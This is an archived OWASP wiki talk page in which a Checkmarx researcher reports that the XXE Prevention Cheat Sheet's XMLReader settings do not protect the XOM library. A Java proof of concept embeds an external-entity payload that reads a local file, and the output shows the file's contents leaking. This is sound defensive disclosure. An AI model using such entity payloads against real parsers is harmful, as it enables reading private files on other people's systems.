This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Talk:XML External Entity (XXE) Prevention Cheat Sheet
The following code suffers from XXE despite the XMLReader recommendations in OWASP that these setFeatures would resolve it.
However, this is not true for XOM.nu (tested on version 1.2.5), a third party XML plugin. I don't know how popular it is, but it is used by Jenkins. Not implying Jenkins is vulnerable, merely that a lib it uses doesn't have proper OWASP usage recommendation.
Anyway, assuming the content of c:\test.txt is "This is TEXT inside the file C:\test.txt"
import java.io.InputStream; import org.apache.commons.io.IOUtils; import org.dom4j.io.SAXReader; import org.xml.sax.XMLReader; import org.xml.sax.helpers.XMLReaderFactory; import nu.xom.*; public class helloworld { public static void main(String[] args) throws Exception { //To get this to run, the file c:\test.txt must exist and have content. alternatively, change the path in <!ENTITY xxe SYSTEM "file:///[file]" String newline = System.getProperty("line.separator"); String xml = "<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>" + newline + "<!DOCTYPE bar [" + newline + "<!ENTITY xxe SYSTEM \"file:///c:/test.txt\">" + newline + "]>" + newline + "<book>"+ newline + "<author>&xxe;</author>"+ newline + "<isbn>11112222333</isbn>"+ newline + "<title>The Great Big Useless Book of XMLs</title>"+ newline + "</book>"; // Vulnerable XOM Parser XMLReader xerces = XMLReaderFactory.createXMLReader(); //xerces.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); xerces.setFeature("http://xml.org/sax/features/external-general-entities", false); xerces.setFeature("http://xml.org/sax/features/external-parameter-entities", false); xerces.setFeature("http://apache.org/xml/features/nonvalidating/load- external-dtd",false); Builder b = new Builder(xerces); InputStream is2 = IOUtils.toInputStream(xml, "UTF-8"); Document d = b.build(is2); System.out.println("XOM Reader: " + d.getValue()); } }
Output:
XOM Reader:
This is TEXT inside the file C:\test.txt
11112222333
The Great Big Useless Book of XMLs
However, by uncommenting
//xerces.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
a 'nu.xom.ParsingException' is thrown for this XML, preventing exploitation.
This leads us (Checkmarx Research Group) to believe the recommendations in OWASP for XMLReader are partial; We actually advise removing direct explicit recommendations entirely and demand devs to adhere to specific platform best practices and documentation, instead.